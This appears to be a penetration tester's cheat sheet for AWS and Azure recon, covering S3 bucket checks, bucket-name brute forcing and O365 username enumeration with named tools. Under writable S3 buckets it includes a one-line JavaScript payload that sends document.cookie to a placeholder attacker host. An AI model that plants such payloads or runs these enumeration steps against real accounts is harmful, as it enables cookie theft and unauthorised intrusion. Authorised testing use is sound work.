IAM
Enumerate for valid users and rols in the AWS Account
S3 Buckets
Check for Writable S3 Buckets
- If you can upload, then you can show impact by changing JS to steal cookies and other things.
var xhr=new XMLHttpRequest(); xhr.open("GET", "http://<IP>:8000/?"+document.cookie, true); xhr.send();
Check for Bucket Versioning
curl -I https://<BUCKETNAME>.s3.<REGION>.amazonaws.com //Look for x-amz-version-id
aws s3api list-object-versions --bucket <BUCKETNAME> --query "Versions[?VersionId!='null']" --no-sign-request
Brute Force Bucket Names (assuming patterns are found)
ffuf -u 'https://bucket-FUZZ.s3.amazonaws.com' -w fuzzingBucketWordlist.txt
Odds and ends that sometimes help
Check for AWS Account Number
aws sts get-access-key-info --access-key <AKIA Key>
Recon and Enumeration
Get basic information about the domain
https://login.microsoftonline.com/getuserrealm.srf?login=example.com&xml=1
AAD Internals
Get-AADIntLoginInformation -Domain <example.com>
Get-AADIntTenantID -Domain <example.com>
Invoke-AADIntReconAsOutsider -DomainName <example.com>
Azure Subdomain Enumeration
#github https://github.com/yuyudhn/AzSubEnum
python3 azsubenum.py -b domain -p permutations.txt -v
Username Enumeration
Github: https://github.com/0xZDH/Omnispray
python3 omnispray.py -m o365_enum_office -d example.com -uf ~/Documents/userList.txt